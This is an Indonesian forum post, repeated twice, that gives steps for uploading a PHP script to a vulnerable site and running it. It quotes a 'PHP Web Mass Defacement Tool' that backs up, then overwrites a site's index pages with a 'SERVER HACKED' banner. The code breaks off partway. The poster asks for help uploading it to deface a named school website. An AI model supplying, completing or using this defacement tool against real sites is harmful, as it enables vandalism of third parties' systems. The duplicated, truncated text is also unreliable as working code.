Ariel
16-09-2006, 06:51 PM
CARA:
Carilah /dapatkan suatu situs yang memang dapat diupload sebuah file berektensi 'PHP'.
Setelah itu upload script ini ke situs tersebut dan segera di eksekusi,contoh;
http://www.situs.com/Upload/phpmass.php
<?php
// X:>php - q phpmass.php
//
//
// PHP Web Mass Defacement Tools
// -------------------------------
// For Security Research Only
//
//
// The\is tools will create a file page for default homepage (www)
// on specified folder/path.But must have permission writable (w+)
// You must to setup folder/path to show directory ($path)
// Before use this tool,upload first into a site writable/vulnerable perms.
//
// Author: Hantu Crew(sillent_cracker@yahoo.co.id)
// Published Date:19:37:41 Saturday, June 04, 2005
//
echo "\n";
echo "\n
======================================\n";
echo " PHP Web Mass Defacement Tools\n";
echo " ======================================\n";
echo " basher13 - Infam0us Gr0up\n\n";
echo "\n";
echo "\n";
echo "[+] ..\n";
$path = "usr/www/html"; // Path to show directory
list (eg;var/www/html)
echo "[+] CHMOD 644 $path..";
chmod ("$path", 0644);
echo "[OK]\n";
echo "[+] Copying and backup for files..\n";
// Prepare to backup/copy files
$file = "index.htm";
if (!copy($file, $file.'.bak')) {
print ("[-] failed to copy $file...\n");
}
$file = "index.html";
if (!copy($file, $file.'.bak')) {
print ("[-] failed to copy $file...\n");
}
$file = "index.php";
if (!copy($file, $file.'.bak')) {
print ("[-] failed to copy $file...\n");
}
$file = "index.asp";
if (!copy($file, $file.'.bak')) {
print ("[-] failed to copy $file...\n");
}
$file = "index.cfm";
if (!copy($file, $file.'.bak')) {
print ("[-] failed to copy $file...\n");
}
echo "[+] List of IP addresses:\n";
$hosts = gethostbynamel('localhost');
print_r($hosts);
echo "\n";
echo "[+] Current directory list :\n";
if ($handle = opendir('.')) {
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != "..") {
echo "$file\n";
}
}
closedir($handle);
}
echo "\n";
echo "[+] Directory list '$path':\n";
if (is_dir($path)) {
if ($dh = opendir($path)) {
while (($file = readdir($dh)) !== false) {
print "filename: $file : filetype: " .
filetype($path . $file) . "\n";
}
closedir($dh);
}
}
echo "\n";
echo "[+] Now attacking ";
$ip = gethostbyname('localhost');
print $ip;
echo "..\n";
echo "[+] Building page extension..";
$fp1 = fopen("index.htm", "w+"); // Writting and
create a page extention (eg;www/html/index.htm)
$fp2 = fopen("index.html", "w+");
$fp3 = fopen("index.php", "w+");
$fp4 = fopen("index.asp", "w+");
$fp5 = fopen("index.cfm", "w+");
$fp6 = fopen("index.bak", "w+");
$fp7 = fopen("HELP.txt", "w+");
echo "[DONE]\n";
echo "[+] Set text defacement..";
// Text input use whit javascript
$msg = "<html><head><title>GO PATCH THE SYSTEM!
</title><meta name=keywords content=ads,advertise,banner,logo,art,anime,images ,picture,graphic,basher13,hacked,deface,hacking,0d ay,security,hacker,program,tools,exploit,vulnerabi lity,
bugs,intrusion,infam0us gr0up,INFGP,INFAMOUS GROUP></head><body bgcolor=#000000
text=#CCCCCC><div align=center><p align=center><font size=7 face=Courier><strong>SISTEM SERVER
HACKED</strong></font><br><strong><font size=3 face=Arial, Helvetica, sans-serif>by</font></strong></p><p align=center><img src=http://k.domaindlx.com/shellcore/basher13.gif
width=100 height=95></p><p align=center><font color=#FFFF00 size=3 face=Arial, Helvetica,
sans-serif><strong>basher13</strong></font></p><div align=center><font size=2 face=Arial, Helvetica,
sans-serif>Infos: - [www.98.to/infamous]</font></p></div></div></body></html>";
echo "[DONE]\n";
echo "[+] Sending bugs writable [w+]..\n";
echo "[+] Create index.htm..";
if (flock($fp1, LOCK_EX)) {
fwrite($fp1, $msg);
flock($fp1, LOCK_UN);
echo "[OK]\n";
}
echo "[+] Create index.html..";
if (flock($fp2, LOCK_EX)) {
Pertanyaan Gw :
[B]Cara Upload Script Tersebut Gimana /? Mohon Pencerahannya /no1
Gw Mao Deface Web Skull Ge Dammit Website (http://www.telkomsekolah-online.net/sekolah.php?Upload/phpmass.php)
Ntar Wa Kasih GRP Nya , Serius /!
Carilah /dapatkan suatu situs yang memang dapat diupload sebuah file berektensi 'PHP'.
Setelah itu upload script ini ke situs tersebut dan segera di eksekusi,contoh;
http://www.situs.com/Upload/phpmass.php
<?php
// X:>php - q phpmass.php
//
//
// PHP Web Mass Defacement Tools
// -------------------------------
// For Security Research Only
//
//
// The\is tools will create a file page for default homepage (www)
// on specified folder/path.But must have permission writable (w+)
// You must to setup folder/path to show directory ($path)
// Before use this tool,upload first into a site writable/vulnerable perms.
//
// Author: Hantu Crew(sillent_cracker@yahoo.co.id)
// Published Date:19:37:41 Saturday, June 04, 2005
//
echo "\n";
echo "\n
======================================\n";
echo " PHP Web Mass Defacement Tools\n";
echo " ======================================\n";
echo " basher13 - Infam0us Gr0up\n\n";
echo "\n";
echo "\n";
echo "[+] ..\n";
$path = "usr/www/html"; // Path to show directory
list (eg;var/www/html)
echo "[+] CHMOD 644 $path..";
chmod ("$path", 0644);
echo "[OK]\n";
echo "[+] Copying and backup for files..\n";
// Prepare to backup/copy files
$file = "index.htm";
if (!copy($file, $file.'.bak')) {
print ("[-] failed to copy $file...\n");
}
$file = "index.html";
if (!copy($file, $file.'.bak')) {
print ("[-] failed to copy $file...\n");
}
$file = "index.php";
if (!copy($file, $file.'.bak')) {
print ("[-] failed to copy $file...\n");
}
$file = "index.asp";
if (!copy($file, $file.'.bak')) {
print ("[-] failed to copy $file...\n");
}
$file = "index.cfm";
if (!copy($file, $file.'.bak')) {
print ("[-] failed to copy $file...\n");
}
echo "[+] List of IP addresses:\n";
$hosts = gethostbynamel('localhost');
print_r($hosts);
echo "\n";
echo "[+] Current directory list :\n";
if ($handle = opendir('.')) {
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != "..") {
echo "$file\n";
}
}
closedir($handle);
}
echo "\n";
echo "[+] Directory list '$path':\n";
if (is_dir($path)) {
if ($dh = opendir($path)) {
while (($file = readdir($dh)) !== false) {
print "filename: $file : filetype: " .
filetype($path . $file) . "\n";
}
closedir($dh);
}
}
echo "\n";
echo "[+] Now attacking ";
$ip = gethostbyname('localhost');
print $ip;
echo "..\n";
echo "[+] Building page extension..";
$fp1 = fopen("index.htm", "w+"); // Writting and
create a page extention (eg;www/html/index.htm)
$fp2 = fopen("index.html", "w+");
$fp3 = fopen("index.php", "w+");
$fp4 = fopen("index.asp", "w+");
$fp5 = fopen("index.cfm", "w+");
$fp6 = fopen("index.bak", "w+");
$fp7 = fopen("HELP.txt", "w+");
echo "[DONE]\n";
echo "[+] Set text defacement..";
// Text input use whit javascript
$msg = "<html><head><title>GO PATCH THE SYSTEM!
</title><meta name=keywords content=ads,advertise,banner,logo,art,anime,images ,picture,graphic,basher13,hacked,deface,hacking,0d ay,security,hacker,program,tools,exploit,vulnerabi lity,
bugs,intrusion,infam0us gr0up,INFGP,INFAMOUS GROUP></head><body bgcolor=#000000
text=#CCCCCC><div align=center><p align=center><font size=7 face=Courier><strong>SISTEM SERVER
HACKED</strong></font><br><strong><font size=3 face=Arial, Helvetica, sans-serif>by</font></strong></p><p align=center><img src=http://k.domaindlx.com/shellcore/basher13.gif
width=100 height=95></p><p align=center><font color=#FFFF00 size=3 face=Arial, Helvetica,
sans-serif><strong>basher13</strong></font></p><div align=center><font size=2 face=Arial, Helvetica,
sans-serif>Infos: - [www.98.to/infamous]</font></p></div></div></body></html>";
echo "[DONE]\n";
echo "[+] Sending bugs writable [w+]..\n";
echo "[+] Create index.htm..";
if (flock($fp1, LOCK_EX)) {
fwrite($fp1, $msg);
flock($fp1, LOCK_UN);
echo "[OK]\n";
}
echo "[+] Create index.html..";
if (flock($fp2, LOCK_EX)) {
Pertanyaan Gw :
[B]Cara Upload Script Tersebut Gimana /? Mohon Pencerahannya /no1
Gw Mao Deface Web Skull Ge Dammit Website (http://www.telkomsekolah-online.net/sekolah.php?Upload/phpmass.php)
Ntar Wa Kasih GRP Nya , Serius /!